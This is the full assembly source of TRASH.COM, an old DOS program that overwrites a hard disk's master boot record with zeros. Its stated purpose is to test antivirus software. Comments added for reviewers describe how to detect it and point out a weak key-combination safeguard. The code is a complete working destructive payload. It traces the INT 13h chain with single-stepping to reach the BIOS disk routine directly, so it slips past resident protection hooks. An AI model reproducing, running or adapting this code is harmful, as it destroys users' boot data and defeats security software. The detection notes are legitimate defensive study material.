;-----------------------------------------------------------------------
; TRASH.COM  --  MASM source, DOS real mode, .COM image (org 100h)
;
; What it does (as the author's own banner states): after an on-screen
; warning and a key-combination gate, it writes 512 zero bytes over the
; master boot record of the first hard disk (drive 80h, cylinder 0,
; head 0, sector 1) to see whether a resident protection program stops
; the write.
;
; How the write is issued: the program never executes 'int 13'. It
; installs its own INT 1 (single-step) handler, enters the INT 13h chain
; with TF set, and records the first CS:IP seen at or above CODEX (the
; ROM range) as the target. The sector write is then made by pushf plus
; a far call to that recorded address, so a hook installed on the INT 13h
; vector is not in the path.
;
; Detection / risk notes for reviewers:
;   * Observable precursors: INT 21h AH=35h then AH=25h on vector 1 (a
;     single-step handler installed by a user program), and an iret whose
;     FLAGS image has TF (bit 8) set.
;   * The write itself is INT 13h AH=03h, AL=1, CX=0001h, DX=0080h,
;     ES:BX = a buffer of zeros.
;   * The key gate is weaker than the banner claims -- see the review
;     notes at the key-code and shift-status tests below.
;
; Numerals: '.radix 16' makes every plain number below hexadecimal
; (600 = 0600h, 21 = 21h, 200 = 200h, ...); '1101b' and '0Dh' are
; explicit.
;-----------------------------------------------------------------------
page ,132
title Trash - smashes the boot record on the first hard disk
name TRASH

.radix 16 ; All unsuffixed numeric literals from here on are hex

code segment
assume cs:code,ds:code

org 100 ; .COM image: CS=DS=ES=SS on entry, code starts at 100h

; Lowest CS value that the INT 1 tracer accepts as "the real handler".
; With 0C000h the trace stops at the first instruction executed from the
; C000h-FFFFh adapter/system ROM range.
CODEX equ 0C000 ; Or use 0300 when tracing DOS

CR equ 0Dh
LF equ 0A

start:
jmp do_it

; --- Data (a .COM has a single segment, so it lives alongside the code) ---
oldint1 dd ? ; Saved INT 1 vector; restored at 'done'
newintx dd ? ; Address the sector write is sent to: initialised to the
             ; INT 13h vector, overwritten by newint1 with the traced CS:IP
oldintx dd ? ; INT 13h vector as read with INT 21h AH=35h; 'faddr' jumps here
trace db 1 ; 1 = newint1 is still searching for the ROM entry; 0 = stop
found db 0 ; Set to 1 by newint1 once an instruction with CS >= CODEX was seen
buffer db 200 dup (0) ; 200h = 512 zero bytes: the sector image written to the MBR
message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
db 'This program, when run, will zero (DESTROY!) the',CR,LF
db 'master boot record of your first hard disk.',CR,LF,CR,LF
db 'The purpose of this is to test the antivirus software,',CR,LF
db 'so be sure you have installed your favourite',CR,LF
db 'protecting program before running this one!',CR,LF
db "(It's almost sure it will fail to protect you anyway!)",CR,LF
db CR,LF,'Press any key to abort, or',CR,LF
db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'

; --- Entry: banner, key gate, then the trace ---
do_it:
mov ax,600 ; Clear the screen by scrolling it up (AH=06h, AL=0 = blank whole window)
mov bh,7 ; Attribute used for the blanked lines
mov dx,1950 ; Lower-right corner of the window: row 19h, column 50h
xor cx,cx ; Upper-left corner: row 0, column 0
int 10

mov ah,0F ; Get the current video mode
int 10 ; (the video page, more exactly: BH = active page, needed by AH=2 below)

mov ah,2 ; Home the cursor (BH still holds the active page)
xor dx,dx
int 10

mov ah,9 ; Print a warning message ('$'-terminated string at DS:DX)
mov dx,offset message
int 21

mov ax,0C08 ; Flush the keyboard and get a char (AH=0Ch flush, then AL=08h read without echo)
int 21
cmp al,0 ; Extended ASCII? (a 0 means a scan code follows on the next read)
jne quit1 ; Exit if not
mov ah,8 ; Get the key code
int 21
cmp al,6C ; Shift-F5?
; NOTE(review): in the usual BIOS extended-key table 6Ch is Alt-F5 (Shift-F5
; is 58h); Ctrl-Alt-RShift-F5 also yields 6Ch because Alt takes precedence.
; Confirm against the keyboard table before relying on the banner's wording.
jne quit1 ; Exit if not
mov ah,2 ; Get keyboard shift status (AL: bit0 RShift, bit2 Ctrl, bit3 Alt)
int 16
and al,1101b ; Ctrl-Alt-RightShift?
; NOTE(review): jnz passes when ANY of the three masked bits is set, not all
; three, so Alt-F5 on its own appears to reach 'proceed'. An all-of check
; would compare the masked value with 1101b. The gate is weaker than the
; banner states.
jnz proceed ; Proceed if so
quit1:
jmp quit ; Otherwise exit

proceed:
mov ah,9 ; Print the last message
mov dx,offset warned
int 21

mov ax,3501 ; Get interrupt vector 1 (single stepping) -> ES:BX
int 21
mov word ptr oldint1,bx
mov word ptr oldint1+2,es

mov ax,2501 ; Set new INT 1 handler (DS:DX = newint1; DS is still the code segment)
mov dx,offset newint1
int 21

mov ax,3513 ; Get interrupt vector 13 -> ES:BX (whatever currently hooks INT 13h)
int 21
mov word ptr oldintx,bx
mov word ptr oldintx+2,es
mov word ptr newintx,bx ; Default write target = current vector, unless newint1 replaces it
mov word ptr newintx+2,es

; The following code is sacred in its present form.
; To change it would cause volcanoes to erupt,
; the ground to shake, and program not to run!
;
; Two iret frames are built by hand (each is FLAGS, CS, IP pushed in that
; order). The outer frame (200h, cs, done) is left on the stack for the
; traced INT 13h chain's own final iret to pop, returning to 'done' with
; IF=1 and TF=0. The inner frame (100h, cs, faddr) is consumed by the iret
; below: it lands on 'faddr' with TF=1 (IF=0), so each following
; instruction raises INT 1 into newint1.
; AH=55h is the function number the INT 13h chain is entered with --
; presumably chosen so that no handler acts on it; TODO confirm.

mov ax,200 ; FLAGS for the outer frame: IF=1, TF=0
push ax
push cs
mov ax,offset done
push ax
mov ax,100 ; FLAGS for the inner frame: TF=1 (bit 8), IF=0
push ax
push cs
mov ax,offset faddr
push ax
mov ah,55
iret ; "Return" into faddr with single-step enabled

assume ds:nothing ; Inside newint1, DS is whatever the interrupted code had;
                  ; with cs:code assumed MASM reaches trace/found/newintx via
                  ; cs: overrides instead

faddr:
jmp oldintx ; Far jump through the saved INT 13h vector, now single-stepped

; INT 1 (single-step) handler. Stack after 'push bp / mov bp,sp':
;   [bp+2] = IP, [bp+4] = CS, [bp+6] = FLAGS of the trapped instruction.
; AX and BP are preserved; FLAGS are returned from the (possibly modified)
; stack image by iret.
newint1:
push bp
mov bp,sp
cmp trace,0 ; Still searching for the ROM entry?
jne search
exit:
and [bp+6],not 100 ; Clear TF in the saved FLAGS: no further traps after this one
exit1:
pop bp
iret
search:
cmp [bp+4],CODEX ; Trapped CS below the ROM range? Keep stepping (TF left set)
jb exit1
;Or use ja if you want to trace DOS-owned interrupt
push ax
mov ax,[bp+4] ; Record CS:IP of the first instruction seen at/above CODEX
mov word ptr newintx+2,ax
mov ax,[bp+2]
mov word ptr newintx,ax
pop ax
mov found,1
mov trace,0
jmp exit ; Stop tracing; the INT 13h chain runs on at full speed from here

assume ds:code
; Intended to be reached when the traced INT 13h chain executes its final
; iret, which pops the outer frame (FLAGS=200h, CS, 'done') built above.
done:
mov trace,0 ; Stop the tracer (already 0 if newint1 found the ROM entry)
push ds
mov ax,word ptr oldint1+2
mov dx,word ptr oldint1
mov ds,ax ; DS:DX = original INT 1 vector
mov ax,2501 ; Restore old INT 1 handler
int 21
pop ds

; Code beyond this point is not sacred...
; It may be perverted in any manner by any pervert.

cmp found,1 ; See if original INT 13 handler found
jne quit ; Exit if not
push ds
pop es ; Restore ES (INT 21h AH=35h left it pointing at the vector's segment)

; The destructive write: INT 13h AH=03h, 1 sector, CHS 0/0/1, drive 80h,
; ES:BX = 512 zero bytes. It is issued with pushf + far call to the traced
; address rather than 'int 13', so a hook on the INT 13h vector is not in
; the path; only the earlier INT 1 install and the TF-setting iret precede it.
mov ax,301 ; Write 1 sector
mov cx,1 ; Cylinder 0, sector 1
mov dx,80 ; Head 0, drive 80h
mov bx,offset buffer
pushf ; Simulate INT 13
call newintx ; Do it (far call through the doubleword at newintx)

quit:
mov ax,4C00 ; Exit program (AL = return code 0)
int 21

code ends
end start